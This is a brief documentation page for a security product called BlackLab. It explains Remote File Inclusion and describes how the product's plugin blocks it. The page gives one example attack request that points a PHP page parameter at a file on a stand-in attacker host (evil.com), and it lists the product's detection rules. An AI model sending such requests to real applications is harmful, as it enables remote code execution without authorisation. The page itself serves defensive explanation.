Skip to main content
Remote File Inclusion (RFI) is a vulnerability where an attacker makes your app load and execute a file from a remote server.

Example attack

GET /index.php?page=http://evil.com/malware.txt
If not protected, this could execute malicious code from the attacker’s server.

## How BlackLab helps
BlackLab’s RFI plugin blocks requests that try to include remote files, such as:

URLs starting with http:// or https:// in parameters

Suspicious query values that point outside your app